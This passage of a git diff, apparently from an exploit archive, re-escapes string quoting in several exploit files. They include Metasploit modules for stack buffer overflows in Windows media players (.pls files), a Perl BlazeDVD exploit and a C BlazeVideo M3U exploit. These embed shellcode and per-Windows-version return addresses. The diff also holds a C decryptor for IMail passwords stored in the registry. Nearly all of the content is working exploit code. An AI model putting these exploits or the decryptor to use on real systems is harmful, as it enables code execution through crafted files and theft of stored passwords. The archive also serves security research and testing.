-					[ \'CVE\', \'2009-0476\' ],
-					[ \'OSVDB\', \'55424\' ],
-					[ \'URL\', \'http://www.exploit-db.com/exploits/10353\' ],
+					[ 'CVE', '2009-0476' ],
+					[ 'OSVDB', '55424' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'seh\',
-					\'DisablePayloadHandler\' => \'true\',
+					'EXITFUNC' => 'seh',
+					'DisablePayloadHandler' => 'true',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'    => 4100,
-					\'BadChars\' => \"\\x00\",
-					\'StackAdjustment\' => -3500,
-					\'EncoderType\'   => Msf::Encoder::Type::AlphanumUpper,
-					\'DisableNops\'   =>  \'True\',
+					'Space'    => 4100,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops'   =>  'True',
 				},
-			\'Platform\' => \'win\',
-			\'Targets\'        =>
+			'Platform' => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows Universal\', { \'Ret\' => 0x1101031E } ], # p/p/r in bass.dll
+					[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
 				],
-			\'Privileged\'     => false,
-			\'DisclosureDate\' => \'Dec 08 2009\',
-			\'DefaultTarget\'  => 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Dec 08 2009',
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new(\'FILENAME\', [ true, \'The file name.\',  \'msf.pls\']),
+				OptString.new('FILENAME', [ true, 'The file name.',  'msf.pls']),
 			], self.class)
 
 	end
@@ -67,13 +67,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 
 		sploit = rand_text_alpha_upper(1308)
-		sploit << \"\\xeb\\x16\\x90\\x90\"
-		sploit << [target.ret].pack(\'V\')
+		sploit << "\xeb\x16\x90\x90"
+		sploit << [target.ret].pack('V')
 		sploit << make_nops(32)
 		sploit << payload.encoded
 		sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
 
-		print_status(\"Creating \'#{datastore[\'FILENAME\']}\' file ...\")
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
 		file_create(sploit)
 
 	end
diff --git a/platforms/windows/local/18082.rb b/platforms/windows/local/18082.rb
index ca8f80b32..52474219f 100755
--- a/platforms/windows/local/18082.rb
+++ b/platforms/windows/local/18082.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,77 +18,77 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\' => \'Mini-Stream 3.0.1.1 Buffer Overflow Exploit\',
-			\'Description\' => %q{
+			'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
+			'Description' => %q{
 					This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
 				By creating a specially crafted pls file, an an attacker may be able
 				to execute arbitrary code.
 			},
-			\'License\' => MSF_LICENSE,
-			\'Author\' =>
+			'License' => MSF_LICENSE,
+			'Author' =>
 				[
-					\'CORELAN Security Team \',
-					\'Ron Henry \', # dijital1; Return address update
+					'CORELAN Security Team ',
+					'Ron Henry ', # dijital1; Return address update
 				],
-			\'Version\' => \'$Revision: 14155 $\',
-			\'References\' =>
+			'Version' => '$Revision: 14155 $',
+			'References' =>
 				[
-					[ \'OSVDB\', \'61341\' ],
-					[ \'URL\', \'http://www.exploit-db.com/exploits/10745\' ],
+					[ 'OSVDB', '61341' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Payload\' =>
+			'Payload' =>
 				{
-					\'Space\' => 3500,
-					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",
-					\'StackAdjustment\' => -3500
+					'Space' => 3500,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
+					'StackAdjustment' => -3500
 				},
-			\'Platform\' => \'win\',
-			\'Targets\' =>
+			'Platform' => 'win',
+			'Targets' =>
 				[
 					[
-						\'Windows XP SP3 ENG\',
+						'Windows XP SP3 ENG',
 						{
-							\'Ret\'    => 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll
-							\'Offset\' => 17417
+							'Ret'    => 0x7e429353,  # 0x7e429353 JMP ESP - USER32.dll
+							'Offset' => 17417
 						}
 					],
 					[
-						\'Windows XP SP2 ENG\',
+						'Windows XP SP2 ENG',
 						{
-							\'Ret\'    => 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll
-							\'Offset\' => 17417
+							'Ret'    => 0x7c941eed,  # 0x7c941eed JMP ESP - SHELL32.dll
+							'Offset' => 17417
 						}
 					]
 				],
-			\'Privileged\' => false,
-			\'DisclosureDate\' => \'Dec 25 2009\',
-			\'DefaultTarget\' => 0))
+			'Privileged' => false,
+			'DisclosureDate' => 'Dec 25 2009',
+			'DefaultTarget' => 0))
 
 		register_options(
 			[
-				OptString.new(\'URIPATH\',  [ true,  \'The URI to use for this exploit\', \'msf.pls\'])
+				OptString.new('URIPATH',  [ true,  'The URI to use for this exploit', 'msf.pls'])
 			], self.class)
 	end
 
 
 	def on_request_uri(cli, request)
 		# Calculate the correct offset
-		host = (datastore[\'SRVHOST\'] == \'0.0.0.0\') ? Rex::Socket.source_address(cli.peerhost) : datastore[\'SRVHOST\']
-		host << \":#{datastore[\'SRVPORT\']}/\"
-		offset = target[\'Offset\'] - host.length
+		host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+		host << ":#{datastore['SRVPORT']}/"
+		offset = target['Offset'] - host.length
 
 		# Construct our buffer
 		sploit = rand_text_alpha(offset)
-		sploit << [target.ret].pack(\'V\')
+		sploit << [target.ret].pack('V')
 		sploit << make_nops(32)
 		sploit << @p
 
-		print_status(\"Sending malicous payload #{cli.peerhost}:#{cli.peerport}...\")
-		send_response(cli, sploit, {\'Content-Type\'=>\'application/pls+xml\'})
+		print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...")
+		send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})
 	end
 
 	def exploit
diff --git a/platforms/windows/local/19683.c b/platforms/windows/local/19683.c
index f0d9b3a9f..bedaf233c 100755
--- a/platforms/windows/local/19683.c
+++ b/platforms/windows/local/19683.c
@@ -1,8 +1,8 @@
 source: http://www.securityfocus.com/bid/880/info
 
-IMail keeps the encrypted passwords for email accounts in a registry key, HKLM\\SOFTWARE\\Ipswitch\\Imail\\Domains\\(DomainName)\\Users\\(UserName), in a string value called \"Password\". The encryption scheme used is weak and has been broken. The following description of the mechanism used is quoted from Matt Conover\'s post to Bugtraq, linked to in full in the Credits section.
+IMail keeps the encrypted passwords for email accounts in a registry key, HKLM\SOFTWARE\Ipswitch\Imail\Domains\(DomainName)\Users\(UserName), in a string value called "Password". The encryption scheme used is weak and has been broken. The following description of the mechanism used is quoted from Matt Conover's post to Bugtraq, linked to in full in the Credits section.
 
-ENCRYPTION SCHEME Take the lowercase of the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Take each letter of the password, find it\'s ASCII equivalent and add the offset (ASCII value of first char of the account name minus 97) then subtract the corresponding difference. Use the differences recursively if the password length is greater than the length of the account name. This gives you the character\'s new ASCII value. Next, Look it up the new ASCII value in the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt) and you now have the encrypted letter.
+ENCRYPTION SCHEME Take the lowercase of the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Take each letter of the password, find it's ASCII equivalent and add the offset (ASCII value of first char of the account name minus 97) then subtract the corresponding difference. Use the differences recursively if the password length is greater than the length of the account name. This gives you the character's new ASCII value. Next, Look it up the new ASCII value in the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt) and you now have the encrypted letter.
 
 Example:
 
@@ -42,7 +42,7 @@ offset: (109 - 97) = 12
 
 Encrypted Password: DFD8CED0E0
 
-The decryption scheme is a little easier. First, like the encryption scheme, take the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Now split the encrypted password by two characters (e.g., EFDE = EF DE) then look up their ASCII equivalent within the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt). Take that ASCII value and add the corresponding difference.Look this value up in the ascii table. This table is made by taking the ASCII value of the first character of the account name and setting it equal to \'a\'.
+The decryption scheme is a little easier. First, like the encryption scheme, take the account name, split it up by letter and convert each letter to its ASCII equivalent. Next, find the difference between each letter and the first letter. Now split the encrypted password by two characters (e.g., EFDE = EF DE) then look up their ASCII equivalent within the ASCII-ENCRYPTED table (see http://www.w00w00.org/imail_map.txt). Take that ASCII value and add the corresponding difference.Look this value up in the ascii table. This table is made by taking the ASCII value of the first character of the account name and setting it equal to 'a'.
 
 EXAMPLE
 
@@ -109,7 +109,7 @@ struct
 
 struct { char *string; } encrypted[60];
 
-char *list = \"0123456789ABCDEF\";
+char *list = "0123456789ABCDEF";
 
 int alpha[95] = {
   32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
@@ -129,13 +129,13 @@ main (int argc, char *argv[])
   if (argc <= 2 || argc > 3) usage (argv[0]);
   if (strlen (argv[2]) > 62)
   {
-     printf (\"\\nERROR: Please enter an encrypted password less than 60 \"
-             \"characters.\\n\\n\");
+     printf ("\nERROR: Please enter an encrypted password less than 60 "
+             "characters.\n\n");
 
      usage (argv[0]);
   }
 
-  printf (\"IMail password decryptor\\nBy: Mike \\n\\n\");
+  printf ("IMail password decryptor\nBy: Mike \n\n");
 
   ascii = -97;
 
@@ -145,10 +145,10 @@ main (int argc, char *argv[])
      for (k = 0; k < strlen (list); k++)
      {
         hashtable[start].string = (char *) malloc (3);
-        sprintf (hashtable[start].string, \"%c%c\", list[i], list[k]);
+        sprintf (hashtable[start].string, "%c%c", list[i], list[k]);
         hashtable[start].o = ascii++;
 
-        /* Don\'t want to skip one! */
+        /* Don't want to skip one! */
         if ((k + 1) != strlen (list)) start++;
      }
 
@@ -160,7 +160,7 @@ main (int argc, char *argv[])
      for (j = k; j < k + strlen (argv[2]); j += 2, start++)
      {
         encrypted[start].string = (char *) malloc (3);
-        sprintf (encrypted[start].string, \"%c%c\", argv[2][j],
+        sprintf (encrypted[start].string, "%c%c", argv[2][j],
                  argv[2][j + 1]);
      }
   }
@@ -169,13 +169,13 @@ main (int argc, char *argv[])
      for (i = 0; i < strlen (argv[1]); i++, start++)
         diffs[start] = (lc(argv[1][0]) - lc(argv[1][i]));
 
-  printf (\"Account Name: %s\\n\", argv[1]);
+  printf ("Account Name: %s\n", argv[1]);
 
-  printf (\"Encrypted: \");
-  for (i = 0; i < strlen (argv[2]) / 2; i++) printf (\"%s\", encrypted[i]);
-  putchar(\'\\n\');
+  printf ("Encrypted: ");
+  for (i = 0; i < strlen (argv[2]) / 2; i++) printf ("%s", encrypted[i]);
+  putchar('\n');
 
-  printf (\"Unencrypted: \");
+  printf ("Unencrypted: ");
   for (i = 0, loop = 0; i < strlen (argv[2]) / 2; i++, loop++)
   {
      num = search (encrypted[i].string) + diffs[i];
@@ -193,7 +193,7 @@ main (int argc, char *argv[])
      putchar(asciic[num]);
   }
 
-  putchar(\'\\n\');
+  putchar('\n');
   return 0;
 }
 
@@ -221,7 +221,7 @@ eql (char *first, char *second)
 int
 lc (int letter)
 {
-  if (letter >= \'A\' && letter <= \'Z\') return letter + \'a\' - \'A\';
+  if (letter >= 'A' && letter <= 'Z') return letter + 'a' - 'A';
   else return letter;
 }
 
@@ -229,10 +229,10 @@ void
 usage (char *name)
 {
 
-  printf (\"IMail password decryptor\\n\");
-  printf (\"By: Mike (Mike@eEye.com)\\n\\n\");
-  printf (\"Usage: %s  \\n\", name);
-  printf (\"E.g., %s crypto CCE5DFE5E2\\n\", name);
+  printf ("IMail password decryptor\n");
+  printf ("By: Mike (Mike@eEye.com)\n\n");
+  printf ("Usage: %s  \n", name);
+  printf ("E.g., %s crypto CCE5DFE5E2\n", name);
   exit (0);
 }
 
@@ -249,9 +249,9 @@ Their site says:
 
 Until we have positive confirmation, you can set an ACL on each registry
 key containing the password to prevent normal users (while still allowing
-IMail) from viewing other users\' passwords.  You are safe to remove read
+IMail) from viewing other users' passwords.  You are safe to remove read
 permissions on these registry keys--they will not affect IMail (as it
-doesn\'t run with user privileges).
+doesn't run with user privileges).
 
 ---------------------------------------------------------------------------
 People that deserve hellos: eEye, USSR, and Interrupt
diff --git a/platforms/windows/local/26889.pl b/platforms/windows/local/26889.pl
index f4f562cf4..d2c85dd0e 100755
--- a/platforms/windows/local/26889.pl
+++ b/platforms/windows/local/26889.pl
@@ -11,47 +11,47 @@
 # special thanks to corelanc0d3r for his amazing tutorials
 
 
-$file = \"blazeExpl.plf\";
-$junk = \"\\x41\" x 260;
-$eip = \"\\x33\\xFE\\xE4\\x77\"; #jmp ESP on kernel32.dll
+$file = "blazeExpl.plf";
+$junk = "\x41" x 260;
+$eip = "\x33\xFE\xE4\x77"; #jmp ESP on kernel32.dll
 
 #msf win/exec calc.exe [*] x86/alpha_mixed 
-$shellcode = \"\\x89\\xe7\\xda\\xd4\\xd9\\x77\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\" .
-\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\" .
-\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\" .
-\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\" .
-\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x78\\x68\\x4d\\x59\\x67\\x70\\x77\\x70\" .
-\"\\x43\\x30\\x65\\x30\\x6b\\x39\\x5a\\x45\\x76\\x51\\x59\\x42\\x52\\x44\" .
-\"\\x6e\\x6b\\x71\\x42\\x46\\x50\\x6e\\x6b\\x56\\x32\\x36\\x6c\\x4e\\x6b\" .
-\"\\x53\\x62\\x66\\x74\\x6c\\x4b\\x33\\x42\\x36\\x48\\x34\\x4f\\x6f\\x47\" .
-\"\\x51\\x5a\\x75\\x76\\x75\\x61\\x39\\x6f\\x45\\x61\\x79\\x50\\x6c\\x6c\" .
-\"\\x67\\x4c\\x70\\x61\\x53\\x4c\\x66\\x62\\x36\\x4c\\x57\\x50\\x5a\\x61\" .
-\"\\x7a\\x6f\\x46\\x6d\\x63\\x31\\x5a\\x67\\x4a\\x42\\x4a\\x50\\x72\\x72\" .
-\"\\x33\\x67\\x6c\\x4b\\x76\\x32\\x76\\x70\\x6c\\x4b\\x53\\x72\\x35\\x6c\" .
-\"\\x46\\x61\\x4a\\x70\\x6e\\x6b\\x31\\x50\\x50\\x78\\x6b\\x35\\x39\\x50\" .
-\"\\x54\\x34\\x62\\x6a\\x67\\x71\\x4e\\x30\\x30\\x50\\x6c\\x4b\\x52\\x68\" .
-\"\\x35\\x48\\x6e\\x6b\\x70\\x58\\x51\\x30\\x43\\x31\\x6a\\x73\\x5a\\x43\" .
-\"\\x55\\x6c\\x43\\x79\\x6c\\x4b\\x37\\x44\\x4c\\x4b\\x37\\x71\\x69\\x46\" .
-\"\\x36\\x51\\x39\\x6f\\x46\\x51\\x4f\\x30\\x4e\\x4c\\x4f\\x31\\x5a\\x6f\" .
-\"\\x64\\x4d\\x37\\x71\\x5a\\x67\\x46\\x58\\x79\\x70\\x43\\x45\\x4b\\x44\" .
-\"\\x77\\x73\\x31\\x6d\\x4b\\x48\\x47\\x4b\\x51\\x6d\\x46\\x44\\x50\\x75\" .
-\"\\x39\\x72\\x30\\x58\\x6c\\x4b\\x53\\x68\\x75\\x74\\x35\\x51\\x59\\x43\" .
-\"\\x65\\x36\\x6c\\x4b\\x36\\x6c\\x52\\x6b\\x6e\\x6b\\x42\\x78\\x47\\x6c\" .
-\"\\x63\\x31\\x48\\x53\\x6e\\x6b\\x63\\x34\\x4e\\x6b\\x56\\x61\\x7a\\x70\" .
-\"\\x6c\\x49\\x73\\x74\\x34\\x64\\x56\\x44\\x63\\x6b\\x53\\x6b\\x43\\x51\" .
-\"\\x61\\x49\\x43\\x6a\\x66\\x31\\x4b\\x4f\\x4b\\x50\\x31\\x48\\x71\\x4f\" .
-\"\\x33\\x6a\\x6c\\x4b\\x32\\x32\\x48\\x6b\\x6e\\x66\\x31\\x4d\\x51\\x7a\" .
-\"\\x76\\x61\\x6c\\x4d\\x6e\\x65\\x4f\\x49\\x37\\x70\\x67\\x70\\x63\\x30\" .
-\"\\x72\\x70\\x70\\x68\\x44\\x71\\x4e\\x6b\\x32\\x4f\\x6b\\x37\\x39\\x6f\" .
-\"\\x38\\x55\\x4f\\x4b\\x7a\\x50\\x6d\\x65\\x6c\\x62\\x70\\x56\\x55\\x38\" .
-\"\\x6f\\x56\\x4d\\x45\\x6d\\x6d\\x6f\\x6d\\x39\\x6f\\x4b\\x65\\x55\\x6c\" .
-\"\\x74\\x46\\x63\\x4c\\x55\\x5a\\x6d\\x50\\x49\\x6b\\x6b\\x50\\x64\\x35\" .
-\"\\x67\\x75\\x6f\\x4b\\x72\\x67\\x57\\x63\\x71\\x62\\x62\\x4f\\x30\\x6a\" .
-\"\\x57\\x70\\x36\\x33\\x69\\x6f\\x68\\x55\\x73\\x53\\x61\\x71\\x72\\x4c\" .
-\"\\x30\\x63\\x44\\x6e\\x70\\x65\\x32\\x58\\x32\\x45\\x65\\x50\\x41\\x41\";
-$junk .= $eip . \"\\x90\" x 50 . $shellcode ;
+$shellcode = "\x89\xe7\xda\xd4\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
+"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
+"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
+"\x42\x75\x4a\x49\x49\x6c\x78\x68\x4d\x59\x67\x70\x77\x70" .
+"\x43\x30\x65\x30\x6b\x39\x5a\x45\x76\x51\x59\x42\x52\x44" .
+"\x6e\x6b\x71\x42\x46\x50\x6e\x6b\x56\x32\x36\x6c\x4e\x6b" .
+"\x53\x62\x66\x74\x6c\x4b\x33\x42\x36\x48\x34\x4f\x6f\x47" .
+"\x51\x5a\x75\x76\x75\x61\x39\x6f\x45\x61\x79\x50\x6c\x6c" .
+"\x67\x4c\x70\x61\x53\x4c\x66\x62\x36\x4c\x57\x50\x5a\x61" .
+"\x7a\x6f\x46\x6d\x63\x31\x5a\x67\x4a\x42\x4a\x50\x72\x72" .
+"\x33\x67\x6c\x4b\x76\x32\x76\x70\x6c\x4b\x53\x72\x35\x6c" .
+"\x46\x61\x4a\x70\x6e\x6b\x31\x50\x50\x78\x6b\x35\x39\x50" .
+"\x54\x34\x62\x6a\x67\x71\x4e\x30\x30\x50\x6c\x4b\x52\x68" .
+"\x35\x48\x6e\x6b\x70\x58\x51\x30\x43\x31\x6a\x73\x5a\x43" .
+"\x55\x6c\x43\x79\x6c\x4b\x37\x44\x4c\x4b\x37\x71\x69\x46" .
+"\x36\x51\x39\x6f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x5a\x6f" .
+"\x64\x4d\x37\x71\x5a\x67\x46\x58\x79\x70\x43\x45\x4b\x44" .
+"\x77\x73\x31\x6d\x4b\x48\x47\x4b\x51\x6d\x46\x44\x50\x75" .
+"\x39\x72\x30\x58\x6c\x4b\x53\x68\x75\x74\x35\x51\x59\x43" .
+"\x65\x36\x6c\x4b\x36\x6c\x52\x6b\x6e\x6b\x42\x78\x47\x6c" .
+"\x63\x31\x48\x53\x6e\x6b\x63\x34\x4e\x6b\x56\x61\x7a\x70" .
+"\x6c\x49\x73\x74\x34\x64\x56\x44\x63\x6b\x53\x6b\x43\x51" .
+"\x61\x49\x43\x6a\x66\x31\x4b\x4f\x4b\x50\x31\x48\x71\x4f" .
+"\x33\x6a\x6c\x4b\x32\x32\x48\x6b\x6e\x66\x31\x4d\x51\x7a" .
+"\x76\x61\x6c\x4d\x6e\x65\x4f\x49\x37\x70\x67\x70\x63\x30" .
+"\x72\x70\x70\x68\x44\x71\x4e\x6b\x32\x4f\x6b\x37\x39\x6f" .
+"\x38\x55\x4f\x4b\x7a\x50\x6d\x65\x6c\x62\x70\x56\x55\x38" .
+"\x6f\x56\x4d\x45\x6d\x6d\x6f\x6d\x39\x6f\x4b\x65\x55\x6c" .
+"\x74\x46\x63\x4c\x55\x5a\x6d\x50\x49\x6b\x6b\x50\x64\x35" .
+"\x67\x75\x6f\x4b\x72\x67\x57\x63\x71\x62\x62\x4f\x30\x6a" .
+"\x57\x70\x36\x33\x69\x6f\x68\x55\x73\x53\x61\x71\x72\x4c" .
+"\x30\x63\x44\x6e\x70\x65\x32\x58\x32\x45\x65\x50\x41\x41";
+$junk .= $eip . "\x90" x 50 . $shellcode ;
 ###############################################################
-open(FILE,\">$file\");
+open(FILE,">$file");
 print FILE $junk;
 close(FILE);
 ###############################################################
diff --git a/platforms/windows/local/2880.c b/platforms/windows/local/2880.c
index 2be74ef6d..b7f9bf9a9 100755
--- a/platforms/windows/local/2880.c
+++ b/platforms/windows/local/2880.c
@@ -9,7 +9,7 @@ attacker to execute code in the context of the player.
 This exploit should also work for BlazeDVD v5.0, but i havent gotten
 around to testing it.
 
-C:\\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
+C:\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
 
 
 Happy Hunting and Happy Holidays to everyone
@@ -38,11 +38,11 @@ int main(int argc, char *argv[])
 
        /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders  */
        unsigned char scode[] =
-       \"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\"
-       \"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM\"
-       \"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp\"
-       \"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip\"
-       \"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA\";
+       "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
+       "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
+       "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
+       "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
+       "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
 
 
        /* replace it with your own shellcode :) */
@@ -50,44 +50,44 @@ int main(int argc, char *argv[])
 
        int JMP, x;
 
-       printf(\"\\n======================================================================\\n\");
-       printf(\"BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit\\n\");
-       printf(\"Discovered and Coded By: Greg Linares \\n\");
-       printf(\"Usage: %s  \\n\", argv[0]);
-       printf(\"\\n JMP Options\\n\");
-       printf(\"1 = English Windows XP SP 2 User32.dll \\n\");
-       printf(\"2 = English Windows XP SP 1 User32.dll \\n\");
-       printf(\"3 = English Windows 2003 SP0 and SP1 User32.dll \\n\");
-       printf(\"4 = English Windows 2000 SP 4 User32.dll  \\n\");
-       printf(\"5 = French Windows XP Pro SP2   \\n\");
-       printf(\"6 = German/Italian/Dutch/Polish Windows XP SP2   \\n\");
-       printf(\"7 = Spainish Windows XP Pro SP2  \\n\");
-       printf(\"8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \\n\");
-       printf(\"9 = French/Italian/Chineese Windows 2000 Server SP4 \\n\");
-       printf(\"====================================================================\\n\\n\\n\");
+       printf("\n======================================================================\n");
+       printf("BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit\n");
+       printf("Discovered and Coded By: Greg Linares \n");
+       printf("Usage: %s  \n", argv[0]);
+       printf("\n JMP Options\n");
+       printf("1 = English Windows XP SP 2 User32.dll \n");
+       printf("2 = English Windows XP SP 1 User32.dll \n");
+       printf("3 = English Windows 2003 SP0 and SP1 User32.dll \n");
+       printf("4 = English Windows 2000 SP 4 User32.dll  \n");
+       printf("5 = French Windows XP Pro SP2   \n");
+       printf("6 = German/Italian/Dutch/Polish Windows XP SP2   \n");
+       printf("7 = Spainish Windows XP Pro SP2  \n");
+       printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \n");
+       printf("9 = French/Italian/Chineese Windows 2000 Server SP4 \n");
+       printf("====================================================================\n\n\n");
 
 
        /* thanks metasploit and jerome for opcodes */
 
        if (argc < 2) {
-               printf(\"Invalid Number Of Arguments\\n\");
+               printf("Invalid Number Of Arguments\n");
                return 1;
        }
 
 
-       Exploit = fopen(argv[1],\"w\");
+       Exploit = fopen(argv[1],"w");
    if ( !Exploit )
    {
-       printf(\"\\nCouldn\'t Open File!\");
+       printf("\nCouldn't Open File!");
        return 1;
    }
 
 
 
-       fputs(\"C:\\\\\", Exploit);
+       fputs("C:\\", Exploit);
 
        for (x=0;x<257;x++) {
-               fputs(\"A\", Exploit);
+               fputs("A", Exploit);
        }
 
 
@@ -100,56 +100,56 @@ int main(int argc, char *argv[])
        }
        switch(JMP) {
                case 1:
-                       printf(\"Using English Windows XP SP2 JMP...\\n\");
-                       fputs(\"\\xbc\\x41\\xdb\\x77\", Exploit);
+                       printf("Using English Windows XP SP2 JMP...\n");
+                       fputs("\xbc\x41\xdb\x77", Exploit);
                        break;
                case 2:
-                       printf(\"Using English Windows XP SP1 JMP...\\n\");
-                       fputs(\"\\xfc\\x18\\xd7\\x77\", Exploit);
+                       printf("Using English Windows XP SP1 JMP...\n");
+                       fputs("\xfc\x18\xd7\x77", Exploit);
                        break;
                case 3:
-                       printf(\"Using English Windows 2003 SP0 & SP1 JMP...\\n\");
-                       fputs(\"\\xdc\\x4a\\xd7\\x77\", Exploit);
+                       printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
+                       fputs("\xdc\x4a\xd7\x77", Exploit);
                        break;
                case 4:
-                       printf(\"Using English Windows 2000 SP 4 JMP...\\n\");
-                       fputs(\"\\x56\\xc2\\xe3\\x77\", Exploit);
+                       printf("Using English Windows 2000 SP 4 JMP...\n");
+                       fputs("\x56\xc2\xe3\x77", Exploit);
                        break;
                case 5:
-                       printf(\"Using French Windows XP SP 2 JMP...\\n\");
-                       fputs(\"\\x9f\\x51\\xd8\\x77\", Exploit);
+                       printf("Using French Windows XP SP 2 JMP...\n");
+                       fputs("\x9f\x51\xd8\x77", Exploit);
                        break;
                case 6:
-                       printf(\"Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\\n\");
-                       fputs(\"\\xa0\\x73\\xd8\\x77\", Exploit);
+                       printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
+                       fputs("\xa0\x73\xd8\x77", Exploit);
                        break;
                case 7:
-                       printf(\"Using Spainish Windows XP SP 2 JMP...\\n\");
-                       fputs(\"\\x2f\\x93\\xd9\\x77\", Exploit);
+                       printf("Using Spainish Windows XP SP 2 JMP...\n");
+                       fputs("\x2f\x93\xd9\x77", Exploit);
                        break;
                case 8:
-                       printf(\"Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\\n\");
-                       fputs(\"\\x29\\x4c\\xe0\\x77\", Exploit);
+                       printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
+                       fputs("\x29\x4c\xe0\x77", Exploit);
                        break;
                case 9:
-                       printf(\"Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\\n\");
-                       fputs(\"\\x29\\x4c\\xdf\\x77\", Exploit);
+                       printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n");
+                       fputs("\x29\x4c\xdf\x77", Exploit);
                        break;
 
        }
 
        for (x=0;x<16;x++) {
-               fputs(\"\\x58\", Exploit);
+               fputs("\x58", Exploit);
        }
        fputs(scode, Exploit);
-       fputs(\"\\r\\n\", Exploit);
+       fputs("\r\n", Exploit);
 
 
-       printf(\"Exploit Succeeded...\\n Output File: %s\\n\\n\", argv[1]);
+       printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
 
 
-       printf(\"Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\\n\");
